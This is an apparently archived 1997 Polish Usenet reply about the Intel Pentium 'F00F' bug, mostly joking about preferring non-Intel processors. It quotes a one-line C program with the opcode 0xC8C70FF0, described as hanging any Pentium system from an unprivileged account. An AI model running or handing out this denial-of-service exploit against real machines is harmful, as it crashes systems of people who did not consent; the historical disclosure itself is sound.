Re: WARNING: Linux Intel Pentium Bug (fwd)

Autor: Piotr Gackiewicz (gacek_at_ds14.agh.edu.pl)
Data: Mon 10 Nov 1997 - 02:44:50 MET

Tomasz Listek (tomlistk_at_friko.onet.pl) wrote:
: Maciej W. Rozycki wrote:
: > Zeby nie bylo za latwo, usunalem kod rozkazu [...]

: Bylo latwo :) ...
: Kod rozkazu to: 0xC8C70FF0

: Przykladowy program wieszajacy kazdego Linuxa, FreeBSD, WIN NT itp. itd.
: dzialajacego pod kontrola INTEL PENTIUM z poziomu dowolnego uzytkownika:

: -------------P5.c---------------cut---------------------------------------
: /*
: Hang up every INTEL Pentium system
: even when running in usermode !
: */

: long main[]={0xC8C70FF0};
: --------------------------------cut---------------------------------------

: Pozdrowienia: Tomasz Listek

: PS: Czy teraz jeszcze ktokolwiek kupi procesor INTELA ???
: Moim skromnym zdaniem cena powinna spasc ok 10 krotnie na takie
: smiecie jak P5 :)

Zawsze twierdziłem (no, odkąd mam styczność z innymi architekturami) i
zawsze będę twierdził, że Intel to badziewie. No i macie najlepsze
potwierdzenie tego stwierdzenia :-). Hehe, K5 ma swoje narowy, ale odkąd
założyłem porządny, cyrixowy, przykręcany do socketa cooler - chodzi jak
złoto! I pewnie nie zmienię go na Intela.

He, chciałobysię mieć jakąś ALPHĘ, albo PPC! Ewentualnie SPARCa... Jak będę
już miał dużo pieniążków, to sobie kupię :-).

Gacek.